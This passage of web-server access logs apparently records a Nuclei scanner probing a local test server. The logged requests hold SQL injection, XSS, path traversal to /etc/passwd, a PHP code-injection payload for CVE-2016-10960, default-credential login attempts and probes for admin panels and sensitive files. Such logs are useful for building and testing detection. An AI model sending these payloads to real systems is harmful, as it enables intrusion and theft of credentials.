+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fpui/loginServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/65 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ibeCAcpSSOReg.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/screens HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminlogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22sendForgotPasswordEmail\x5C\x22,\x5C\x22params\x5C\x22:[\x5C\x22user@local.email\x5C\x22],\x5C\x22id\x5C\x22:\x5C\x223\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/66 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infophp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpwiki/index.php/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xxl-job-admin/toLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /perl-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/67 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ 